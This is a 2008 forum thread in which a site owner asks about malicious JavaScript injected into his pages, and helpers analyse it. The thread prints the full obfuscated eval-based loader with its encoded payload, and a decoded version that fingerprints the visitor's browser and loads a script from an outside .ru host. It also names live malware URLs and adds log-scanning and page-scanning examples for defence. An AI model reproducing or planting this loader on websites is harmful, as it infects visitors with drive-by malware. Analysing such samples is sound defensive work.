Author Topic: Website got hacked  (Read 14569 times)

August 18, 2008, 09:59:08 am

samibdr

Hello,
We had a problem recently with someone installing a script on our website. We had removed the script from all pages manually, changed hosting provider and changed all the passwords. Today it happened again and they managed to install the same script. This script is calling another script from ujnc.ru, jkn3.ru, porv.ru, ujnc.ru and more... The script that is called from these websites is called JS.js.

Because of this script, our website was marked as harmful on Google and we are losing clients. I'm not sure what this script is doing. I would appreciate some feedback on what's happening here.

August 18, 2008, 11:26:29 am
Reply #1

Orac

Can you provide a link to your website, and also the links to the scripts they're trying to install on your server?
Malware analysed using Clarified Analyzer to record and document how malware behaves in a networking environment

August 18, 2008, 11:39:28 am
Reply #2

samibdr

My website is maltatravelnet.com.
Links to the script are:

http://www.jkn3.ru/js.js
http://www.ujnc.ru/js.js
http://www.porv.ru/js.js

I don't think the links are working now, but this morning they were, and I saved the js file to my PC. I zipped and uploaded it here:
www.sb-websolutions.com/1.zip

I also included our index.htm file. You will find the script that is calling the js file at the bottom of the source code.

Please tell me what this js file is doing to our website, as I don't know JavaScript.

Thanks

August 18, 2008, 03:00:13 pm
Reply #3

MysteryFCM

The following is what the script gets;

Code:
*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: http://okcd.ru/cgi-bin/index.cgi?ad
Server IP: 70.126.163.53 [ 53-163.126-70.tampabay.res.rr.com ]
 > 122.100.67.72 [ 122-100-67-72.cm.ubbn.net ]
 > 69.133.138.54 [ cpe-069-133-138-054.ec.res.rr.com ]
 > 67.70.151.9 [ bas5-toronto12-1128699657.dsl.bell.ca ]
 > 24.173.57.194 [ rrcs-24-173-57-194.sw.biz.rr.com ]
 > 98.233.229.119 [ c-98-233-229-119.hsd1.md.comcast.net ]
 > 88.2.47.117 [ 117.Red-88-2-47.staticIP.rima-tde.net ]
 > 72.51.179.194 [ host-72-51-179-194.newwavecomm.net ]
 > 24.57.105.118 [ d57-105-118.home.cgocable.net ]
 > 24.226.26.87 [ d226-26-87.home.cgocable.net ]
 > 86.14.232.146 [ cpc5-cmbg4-0-0-cust145.cmbg.cable.ntl.com ]
 > 76.248.170.0 [ adsl-76-248-170-0.dsl.chi2ca.sbcglobal.net ]
 > 88.250.184.95 [ dsl88-250-47199.ttnet.net.tr ]
 > 75.143.150.108 [ Resolution failed ]
 > 76.124.4.21 [ c-76-124-4-21.hsd1.nj.comcast.net ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 1
iFrames: 0
Date: 18 August 2008
Time: 15:39:25:39
*****************************************************************
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<script type="text/javascript">
<!--
function b40R3eLSm(g1x5L617n, DxnI31GgB){var jg2U8o88H = arguments.callee;var ci0ejw4sf = location.href;jg2U8o88H = jg2U8o88H.toString();jg2U8o88H = jg2U8o88H + ci0ejw4sf;var d0Siy8ewr = jg2U8o88H.replace(/\W/g, "");d0Siy8ewr = d0Siy8ewr.toUpperCase();var MYX1e340Q = 4294967296;var CQ62jhasD = new Array;for(var e3FHCq2T3 = 0; e3FHCq2T3 < 256; e3FHCq2T3++) {CQ62jhasD[e3FHCq2T3] = 0;}var himAPxx55 = 1;for(var e3FHCq2T3 = 128; e3FHCq2T3; e3FHCq2T3 >>= 1) {himAPxx55 = himAPxx55 >>> 1 ^ (himAPxx55 & 1 ? 3988292384 : 0);for(var iS4jqp728 = 0; iS4jqp728 < 256; iS4jqp728 += e3FHCq2T3 * 2) {var RWMygP4i1 = e3FHCq2T3 + iS4jqp728;CQ62jhasD[RWMygP4i1] = CQ62jhasD[iS4jqp728] ^ himAPxx55;if (CQ62jhasD[RWMygP4i1] < 0) {CQ62jhasD[RWMygP4i1] += MYX1e340Q;}}}var Uaj1JuWwL = MYX1e340Q - 1;for(var mLpJkeD0Y = 0; mLpJkeD0Y < d0Siy8ewr.length; mLpJkeD0Y++) {var mtBwq5tH6 = (Uaj1JuWwL ^ d0Siy8ewr.charCodeAt(mLpJkeD0Y)) & 255;Uaj1JuWwL = (Uaj1JuWwL >>> 8) ^ CQ62jhasD[mtBwq5tH6];}Uaj1JuWwL = Uaj1JuWwL ^ (MYX1e340Q - 1);if (Uaj1JuWwL < 0) {Uaj1JuWwL += MYX1e340Q;}Uaj1JuWwL = Uaj1JuWwL.toString(16).toUpperCase();while(Uaj1JuWwL.length < 8) {Uaj1JuWwL = "0" + Uaj1JuWwL;}var tmIqpH535 = new Array;for(var e3FHCq2T3 = 0; e3FHCq2T3 < 8; e3FHCq2T3++) {tmIqpH535[e3FHCq2T3] = Uaj1JuWwL.charCodeAt(e3FHCq2T3);}var V44D6xwFb = "";var fWpa4Y7hY = 0;for(var e3FHCq2T3 = 0; e3FHCq2T3 < g1x5L617n.length; e3FHCq2T3 += 2){var RWMygP4i1 = g1x5L617n.substr(e3FHCq2T3, 2);var JxwOKxgq5 = parseInt(RWMygP4i1, 16);var vctXKKPN7 = JxwOKxgq5 - tmIqpH535[fWpa4Y7hY];if(vctXKKPN7 < 0) {vctXKKPN7 = vctXKKPN7 + 256;}V44D6xwFb += String.fromCharCode(vctXKKPN7);if(fWpa4Y7hY + 1 == tmIqpH535.length) {fWpa4Y7hY = 0;} else {fWpa4Y7hY++;}}var B1BkmOQej = 0;try {eval(V44D6xwFb);} catch(e) {B1BkmOQej = 1;}try {if (B1BkmOQej) {window.location = "/";}} catch(e) {}}
//-->
</script>
</head>
<body onload="b40R3eLSm('98ACAFA6A899A4B452B07373657d787B7f6e6999A6a3797A6389B7B66050798FA3A98Ab47f71666FadadA2b5547bADBA8299B6ab817255835298b3AAa99d9aB4A6AA6fA6959ca1ab9772b7A4a6508c7Ba56997AB81676c666F57ADB29791A9AFA1A56fABA6959B817dAFb59396a59D9374577E637fA8a99694ACA990765ea9B585abb3acA2975D6F6d82B9b78492aaae7f796180547badBA8299b6ab81725571528e76b666869D93696e7cb995A255b86586728a9F678B895274618EACa485a8a79F8E8562a29ab69E98a4A85C5f919d619E6D6356525e81a46A90747B9b6c9c75577e63A663847779A27899775ea9B587A7b1A8a67396b9975f6a7Eaa91A766758375a882937DAC67577E6368626E7a6B6D78756d6670BC93a961996c6067AF896AB3AD546d55B497ae6184a6A296bf6D9DB0B55CA696B8528183946899969782826180546070667c7992779d9186967d577d6366656B81528183946899969782826C6E5D50B09C6a6773AC8B63a7B08d8183946899969782829e6371506581afadA2B5548989b896A09977A463558352687ca9A3A25dBC93A9618D768169AF9388918E546D5577646f7c637e72867a9B9892937F6B5590748875AC9581859152757F8054615E66AD9095B598998D7AA26a6180548989b896a09977A463558470756174548E556e8b8bB3a79D8869b665576763655074666570797b666967796A6b617d54605e8198A6B36Baa91A766a59Fa3BC8A68669b62577E63646B55B99A99BA996c618A765273617569667066A59fa3bc8a68669B62576c80547a779766a0a294847B557052696A63afA696b8529E85799e6667ab777A6180547a779766a0A294847B557152AAa9a5ad866d7787677c996c6067AF896ab3ad8F97797C9C6D73a8797392666F57977B64629e9D65a9AB9ea79897bf886F7298648d55A4529095B598998D7AA26a7CAC9a505d9c6A6773AC8b63a7b08D9e85799E6667ab777A9e637050656F52B2977B64629E9d65A9AB9e9B746bb06869A688778D55716f57848f689583a97A9d767eB1ADb2bc93A9618983836787988d72A6546D55897E6Ba69197789B7b526461746f96a4b85aADa2B554A26aB663a171786962558352677c63a665a5779c67767866507166A46A90747b9b6c9c7565adA8A297a9ae6D57B378A4619F76676C736E5F5955c1a898B36396617Bb76279828e805072665A7d909666719B9C639A61a154a26895637Eac7a8a7363A99A98B386A3949A87a65Fb378A4619F76676C736C5d505B66646C767E7A7F8878739d9774975072665a7d909666719b9C639a6181726e557e5B579f638A6865789b8E74b59e8B977778a87185757B81a36dB48792876276ac8868A46371507b95856982A
98A6198669057698680649a94957FA778545d55775b72aaa954587b95856982a98A6198666e57716c54AB7b95856982a98A6198665d74618680649a94957Fa7786fAD7B95856982a98a6198666F578792876276AC8868a471a89F88BAa4a0afaa5c616B6F60ABb098a4A09AB87598b4a85C5970bd9Aa0adA85C7684996478A799659363b297a5A8b79c5071666a6061BE7A7f8878739d977497507266546763635f507B95856982a98A619881afadA2B554936DBA7E9f85afA467558352A5A6BA5471a7B893b07Ca9a3a25Dbc93a9618d768169AF9388918e546d55766D578B8585649Ea783878c6370506D81528183946899969782826C6E5d50B0A96AAB8dab789Ca57d8d8183946899969782829E6371507B95856982a98A619874959FA2B5779f99AB73AB698d768169AF9388918E5d6bb2bc93a961867b8485BB676eB7b6546D55685472B7A4A650ac9A746B927a6A859c666F57717E9A9FA76eA898b3637E72867A9b9892937f5072666272618D768169af9388918e546C559cA4AA85776582ABb960A3A6b19Ba49d8152818394689996978282616e7150676FADadA2b55497797C9C6d73a879735583528DB3b678646698A8aa6fB6a992a8baA45F8b8585649Ea783878C6f54625E81a898b3637A896D9F7eA583B179507266a298B3b69979a3ba5A9E85799e6667ab777a6d6365665E81a898b3638664968F6a6B8C8F645072667890799c809E77B477576E639768a9929A7bADb36B8BAC9A746B927A6A859ca36dA0a76b8664968F6A6B8C8F64507166626061BE8664968f6A6b8c8f64507266846BA28c6c64809262576C6366656B81AF7a889784a56a7da8aa616E715088BAA4A0AFAA6296A7b59F7aa9A4a673A4AA975F937795796d7a7d83716c6f999b6Ea98B837785676B9b99576C6365507283529a79B7809879B2A26e6FAF999E9cba9A6061BEAB84777A836E77989b5072666272BE63999CA8ab52b2b8977664867D688ca86e5f6bb2C3A898B36382776ABF93988BB2695072666272b5b5ad50B0ABA898ad6B77778996a76C78B9A75970C3529Aa2B797985dab5B57bc917B65AEa79381B078546d55776DB4b5B5ad50b0AF985769917B65aea79381b0785d50B0bd9bA5a5B2AB5Ea1b59598B5acA39e5583525970656Fadb2669598B5A69C589A6F52b2bec03Ea967766384847881675d6D936dA27b7567967F6b9b7a7c966297a769677A7596957688686E7aA46d6497AC7479767C6c616a7a686877a969616a76667D757695946e87676776A66a65768794687A86766976776b6c827576686C7a939877a676756b7a686D77856c966D886899767c969669776598757468757789736a82856A646Ca76979787a6b646eaa6b6Ca27a76656BAC659B74a89691967D946B767
C966676776869777C6C686Dac736e7a736A646c7767678275756577897379a2737565967e6B7dA2796B62767D9469827c6d616Eaa6B9c827696666Ea9936E828576676Eaa6B9DA2756b766A79667a82899565767C6767787896656D8A6b697a866d916d79736D76776c616b7c689D77A4696168AB736d7a7896666b7C6B68a2736c666C7F6A6D7a896c917779686978796a646A7c686777786a666d77667D7576696168AB936e7Aa675749778936e77746a936C7B936878856D64767f6b6F797B76716a7a689B767796669779696B77a86C686C8A6B6c79856B62768C74677a8775697689697D7AA46A936B7E699B79a66d646A7C677a76776c65977d6a70797C75676d87699d82846a966c7D687977756A646A7b689b76776b616c7d6899767C96966977659874a77671967d746b767c6d686e7f6A6a82786D616C7d9499797a6a646c776767827996616c7e696E78A76C746e7f6A6E7775756796ab736aa2a56C65767e676f787876656d8A6B697A866D916D79936d76896B676bac697B7579689569776578748775747689686977746D686e7F6A6a82786D616C7d7479797A6A646c77687B76776a666C7D686B7775696168AB657074A76d6396AA6A6B78886d716e8C696Da2746A646D79686976a56b646b7c676977a969616a7666997AA87660967d6b6c7677959496a9686977746D686E7f6A6Aa2786d616c7D7479797a6A646c77687b76776A666C7e686b77756961688B657074A76D6396aa6a6B78A86D916Eac696dA2746a646d79686976A56b646b7D676977a969616a7666997A889660767D6b6C767775747689686977746d686E7F6A6AA2786D616c7D9499797A6a646C77687B76776A666c7F686b77756961688b657074a76D63768a6A6B78886D716e8C696da2746a646d79686976A56B646B7e6769778969616a7666997Aa89660967d6b6c7677757496a9686977746D686E7f6A6AA2786D616c7D9499797a6a646c77687B76776a666c87686b77756961688B657074A76D6396aa6a6B78a86D916eac696d82746a646D79686976856b646b7f6769778969616a7666997a889660767D6b6c7677959496a9686977746d686E7F6a6a82786D616c7D9499797a6a646C77689B76776A666Ca8686b7775696168ab657074A76d63768A6a6B78a86d916E8C696d82746a646D79686976856b646B876769778969616A7666997AA87660967D6b6C767795947689686977746D686E7f6a6a82786d616c7D7479797A6A646C77689B76776A666Ca9686b77756961688B657074876d6396AA6A6B78886D916e8c696da2746a646D79686976856b646B886769778969616a76669D757668746eaa6B6d76776A936e7b937078856c696d876B9978A476616b7C686A78796A646A7c6867777
86a666bAC669D7576689468AA6B69a2797569967d939B78776961688B939B757468756A79667aA27575716a7A676f797695926d7e6a6E79A995966c876b7b76776c616d79686976A56B646b7b676976776a716ba96869A2A576616B7C686C787b6C7496A86b70777A959496786b6B7a7c76736e7B936f77746a666D7c6b6ca2739569967D946c7Aa86A646c7D6B6882759568768C736d7aa496686e7F676977736A646c7C6879767c6A656C77676777746B656BAC667D757668946D796B6E78796C696e89737B788996616a7A689B76776A666c7c699876856b9669776578757468956A79667a82897565767C676778786B696DA96A9ca2746D686b876B6976776C616b7c74677aa476716e8A6B6e7a789668777b946b777A7667768a736a827b956997796A9C7a8496626E88736C7A78757276886967A2a696696E7C936aA27b76666bAB696977786A646B7b686776a76B766a79667aA2a97565967C6767797B95947876936cA3766b64767A6B6D76776C616B7c686b76a56b9669776578757468956a79667A7A899663967C676f82849565977E6869797495656C87696d798576686DAB746778796B646Bac696F7A786C716Da96B7082876C939678687A78786b696Da96A9CA2746d686B876B697775966076889467A27376686EA9687978a695656D896a6f7a7376686Ca96b7c76A96a766bAC686983776961688B65707aa66d6296a8939C79A776726B7a736e76776c616B7c6A6a77a86C716d766B6f797B6B91767e69677A8695936e7b7369787a76637687936e788496686AA9696f7a786c916D896b70A2A76C737678677077757668777b6B6ca2a776666Eaa6B9c7A856A736C7d696f77756B966977659875746875698C73797A896A646A896b6F7975956977786b6D83736B647688676778736a646C7e68997579687568AA6570797B75749876936CA3766B64767a6B6D76776A966d79686976856b646A7c6879757468956A79669a75756d686EAA93987A7a76756c7C94697A896A646A8C689B767795936E7a936e82786d6896a8686782856B766a79667Aa379696168ab657B74A89692768b7379827875696A896a6b7A877675767f949A777C96646EA7677ca2739569777a7370A2a775736A7a687a76776B666C7C68797579687568AA6a6b7A877675967f949a777C76646E87676776a96C616b7C686b777C6b646A7C6879757468756A79669a7579687596A76b68A2796A646da96a7B78866b646DA86A6aA27576656B7c697d767c6d636E886969787c6d7177776a6f82796A646A8c6767797b75749876936c83766B64767a6B6d77A969616A76946F7Aa496666A7A936B79876c65767f6b69797995916e7b676778746a6496A794687aA6766996776b6cA27596686C7A736cA2A
575696E7B936B7a7C6C699778936E827975699678936b76A66A66977f936CA2a57574967A936B76796a946D77669d757696686daa69687A7a6d646E79936f7a846B62767D6b6cA27B6C657787746Da2a575746e7c936c827b95696b8b686ba2A77674967a6b6c76796b606B7c686b828775697689736B77767575967D746f7a8476676e7d73697aA776647787686B77756b7669776598827B6D946d7D736c797C6d616e876b68777596677688746d78a47668767E73697aA7756697a8746d7aa86A936a7c936A827975676b7E689c767C6A666eA9936b827b96646D766968777b96636e8C6b6a7a7B6b62977e746e777b75676EA86B7077747566768c9467777B757496786b6b7A7c96936c7a736C827375746c796870777a6B656c7D69787a8975676B87686777786b646C7C936F777C6B916B7A686777776B726caa936e777C75696e7e686C77866b646C896969777c6b646B7A686777776b646C7c696977A575686E7c6b6977A675656c8a696D787375716E87676976776a966B7c6a6f79776c676B7a6A6e797a7662977d689978776961688b6b6b8276956797A8737D7A889662767e679C7A79966376877479777a9565767A73677A7c966276876a6C8274757476766B6B76a676686eac6a6a7aa66D646D776B6D7A786a746D77667D7576776169776578686c6F')">

</body>
</html>


I can't get it to decode any further, however.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

August 18, 2008, 04:26:14 pm
Reply #4

bobby

This is the decoded script:
Code:
// Sets one flag on document, then runs only if a second flag is not already set.
document.Yzw7fPyy = 1;
if (!document.h3z067KE) {
    var FKC0WSnq;
    // Map the ";SPn" marker in navigator.appMinorVersion to a two-digit code ("01" = none found).
    var rm25DIeW = navigator.appMinorVersion;
    var AqGPcVOv = -1
    var OgBEVkFm = "01";
    while((AqGPcVOv = rm25DIeW.indexOf(";SP", AqGPcVOv+1)) != -1) {
        var TeSqM1yN = rm25DIeW.charAt(AqGPcVOv+3);
        if (TeSqM1yN == "1")
            OgBEVkFm = "02";
        else if (TeSqM1yN == "2")
            OgBEVkFm = "03";
        else if (TeSqM1yN == "3")
            OgBEVkFm = "04";
        else if (TeSqM1yN == "4")
            OgBEVkFm = "05";
        else if (TeSqM1yN == "5")
            OgBEVkFm = "06";
        else if (TeSqM1yN == "6")
            OgBEVkFm = "07";
        if (OgBEVkFm != "01")
            break;
    }
    if (OgBEVkFm == "01" && rm25DIeW.indexOf("Release Candidate", 0) != -1)
        OgBEVkFm = "08";
    // Hex-encode the first 10 characters of navigator.systemLanguage, padded with "00" to 20 digits.
    var A5FLhT6b = navigator.systemLanguage.substr(0, 10);
    var Tizcz0pf = "";
    for(var HaFFWtHn=0;HaFFWtHn<A5FLhT6b.length;HaFFWtHn++) {
        hNelTw0w = A5FLhT6b.charCodeAt(HaFFWtHn).toString(16);
        if (hNelTw0w < 2)
            Tizcz0pf += "0";
        Tizcz0pf += hNelTw0w;
    }
    while(Tizcz0pf.length < 20)
        Tizcz0pf += "00";
    // Append code + language to the query string and add the result to the page as a new script element.
    var FKC0WSnq = OgBEVkFm + Tizcz0pf;
    var tYAcPMfa = document.createElement("script");
    tYAcPMfa.setAttribute("type", "text/javascript");
    tYAcPMfa.setAttribute("src", "http://juc8.ru/cgi-bin/index.cgi?3c42f2a30100f0600077e0ed580660b8ab990274ebb2a0ff" + FKC0WSnq);
    document.body.appendChild(tYAcPMfa);
}

Sorry, I do not have time now to calculate the download link, but I saw something interesting - the script will load only if the system language is set to far east Asian languages (Chinese and countries around China).

August 18, 2008, 05:15:02 pm
Reply #5

JohnC

Code:
// Stub navigator with fixed values so the sample can run in an analysis tool.
function my_navigator () {
    this.appMinorVersion = "0";
    this.systemLanguage = "en-gb";
};

navigator = new my_navigator;

document.Yzw7fPyy = 1;
if (!document.h3z067KE) {
    var FKC0WSnq;
    var rm25DIeW = navigator.appMinorVersion;
    var AqGPcVOv = -1
    var OgBEVkFm = "01";
    while((AqGPcVOv = rm25DIeW.indexOf(";SP", AqGPcVOv+1)) != -1) {
        var TeSqM1yN = rm25DIeW.charAt(AqGPcVOv+3);
        if (TeSqM1yN == "1")
            OgBEVkFm = "02";
        else if (TeSqM1yN == "2")
            OgBEVkFm = "03";
        else if (TeSqM1yN == "3")
            OgBEVkFm = "04";
        else if (TeSqM1yN == "4")
            OgBEVkFm = "05";
        else if (TeSqM1yN == "5")
            OgBEVkFm = "06";
        else if (TeSqM1yN == "6")
            OgBEVkFm = "07";
        if (OgBEVkFm != "01")
            break;
    }
    if (OgBEVkFm == "01" && rm25DIeW.indexOf("Release Candidate", 0) != -1)
        OgBEVkFm = "08";
    var A5FLhT6b = navigator.systemLanguage.substr(0, 10);
    var Tizcz0pf = "";
    for(var HaFFWtHn=0;HaFFWtHn<A5FLhT6b.length;HaFFWtHn++) {
        hNelTw0w = A5FLhT6b.charCodeAt(HaFFWtHn).toString(16);
        if (hNelTw0w < 2)
            Tizcz0pf += "0";
        Tizcz0pf += hNelTw0w;
    }
    while(Tizcz0pf.length < 20)
        Tizcz0pf += "00";
    var FKC0WSnq = OgBEVkFm + Tizcz0pf;
    // Script-element creation is disabled; the URL is written out instead of being loaded.
    //var tYAcPMfa = document.createElement("script");
    //tYAcPMfa.setAttribute("type", "text/javascript");
    document.write("http://juc8.ru/cgi-bin/index.cgi?3c42f2a30100f0600077e0ed580660b8ab990274ebb2a0ff" + FKC0WSnq);
    // tYAcPMfa is never created above, so the append is disabled as well.
    //document.body.appendChild(tYAcPMfa);
}
 

Use the correct referrer http://juc8.ru/cgi-bin/index.cgi?ad when you get the contents of the next URL.
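
The decoded script above appends a two-digit service-pack code and a hex-encoded `navigator.systemLanguage` to the request URL, so the same fields can be read back out of proxy logs when hunting for affected visitors. The following is an added example, not code from any poster in this thread; the log format, client addresses and the `parseBeacon`/`scanLog` names are constructed for illustration, and the query layout is inferred from the single sample shown here.

```javascript
// Added example (not from the thread). Query layout inferred from the one sample shown:
//   /cgi-bin/index.cgi?<hex token><2-digit code><20 hex digits of systemLanguage>
const SP_LABELS = {
  "01": "no ;SP marker", "02": "SP1", "03": "SP2", "04": "SP3",
  "05": "SP4", "06": "SP5", "07": "SP6", "08": "Release Candidate",
};

// Returns the decoded fields, or null when the URL does not fit the layout.
function parseBeacon(url) {
  const m = /^https?:\/\/([^\/\s]+)\/cgi-bin\/index\.cgi\?([0-9a-f]+)$/i.exec(url);
  if (!m || m[2].length <= 22) return null;
  const query = m[2].toLowerCase();
  const spCode = query.slice(-22, -20);
  const langHex = query.slice(-20);
  if (!(spCode in SP_LABELS)) return null;
  let language = "";
  for (let i = 0; i < langHex.length; i += 2) {
    const code = parseInt(langHex.slice(i, i + 2), 16);
    if (code === 0) break;                        // "00" is padding
    if (code < 0x20 || code > 0x7e) return null;  // not a printable language tag
    language += String.fromCharCode(code);
  }
  if (language === "") return null;
  const token = query.slice(0, -22);
  return { host: m[1].toLowerCase(), token, spCode, sp: SP_LABELS[spCode], language };
}

// Log lines are "<time> <client> <url>"; this format is constructed for the example.
function scanLog(text) {
  const hits = [];
  for (const line of text.split("\n")) {
    const [time, client, url] = line.trim().split(/\s+/);
    const beacon = url ? parseBeacon(url) : null;
    if (beacon) hits.push({ time, client, ...beacon });
  }
  return hits;
}

// Constructed sample log; the host and token are the ones quoted in the thread.
const TOKEN = "3c42f2a30100f0600077e0ed580660b8ab990274ebb2a0ff";
const SAMPLE_LOG = [
  `2008-08-18T15:39:25Z 10.0.0.21 http://juc8.ru/cgi-bin/index.cgi?${TOKEN}01656e2d67620000000000`,
  `2008-08-18T15:40:02Z 10.0.0.37 http://juc8.ru/cgi-bin/index.cgi?${TOKEN}037a682d636e0000000000`,
  "2008-08-18T15:41:10Z 10.0.0.21 http://juc8.ru/cgi-bin/index.cgi?ad",
  "2008-08-18T15:41:30Z 10.0.0.40 http://www.example.com/index.htm",
].join("\n");

for (const h of scanLog(SAMPLE_LOG)) {
  console.log(`${h.time} ${h.client} -> ${h.host} sp=${h.sp} lang=${h.language}`);
}
```
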

August 18, 2008, 05:54:37 pm
Reply #6

samibdr

Thanks guys. I will submit this to the hosting provider and see what we can do. Any suggestions on what I can do to prevent these scripts from being installed again?

August 18, 2008, 05:58:38 pm
Reply #7

MysteryFCM

1. Change FTP/ACP etc. passwords (and use > 10 char alphanumeric + special characters)
2. Patch the server to protect against exploit
3. Lock down your site's code!!!
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net
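
For catching a repeat of the injection described at the start of the thread (a script tag at the bottom of the page pulling js.js from an outside host), one option is to scan the site's files for `<script src>` tags whose host is not on an allowlist. This is an added example, not code from the thread; the sample page, the `www.example.com` site host and the `findForeignScripts` name are assumptions made for illustration.

```javascript
// Added example (not from the thread): report <script src> tags that load
// from a host outside the allowlist, with the line number of each tag.
function findForeignScripts(html, allowedHosts, siteOrigin) {
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  const findings = [];
  // Handles double-quoted, single-quoted and unquoted src values.
  const tagRe = /<script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))[^>]*>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const src = (m[1] ?? m[2] ?? m[3]).trim();
    let host;
    try {
      // Relative and protocol-relative values resolve against the site's own origin.
      host = new URL(src, siteOrigin).hostname.toLowerCase();
    } catch {
      host = "(unparseable)";
    }
    if (!allowed.has(host)) {
      const line = html.slice(0, m.index).split("\n").length;
      findings.push({ line, host, src });
    }
  }
  return findings;
}

// Constructed sample page: one legitimate local script, then two injected
// tags in the forms a scanner has to cope with (unquoted, protocol-relative).
const SAMPLE_PAGE = [
  "<html><head>",
  '<script type="text/javascript" src="/js/menu.js"></script>',
  "</head><body>",
  "<p>Welcome</p>",
  "<script src=http://www.ujnc.ru/js.js></script>",
  '<SCRIPT SRC="//www.jkn3.ru/js.js"></SCRIPT>',
  "</body></html>",
].join("\n");

const SITE_ORIGIN = "http://www.example.com/"; // assumed site address
for (const f of findForeignScripts(SAMPLE_PAGE, ["www.example.com"], SITE_ORIGIN)) {
  console.log(`line ${f.line}: script loaded from ${f.host} (${f.src})`);
}
```

Run against every served file on a schedule, and compare the results with a known-good copy kept off the server, so a re-injection is noticed before a search engine flags the site.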

August 19, 2008, 10:10:17 am
Reply #8

samibdr

Could someone tell me what this script is doing exactly, in plain English? I don't really know JavaScript. I want to track the source of this. Thanks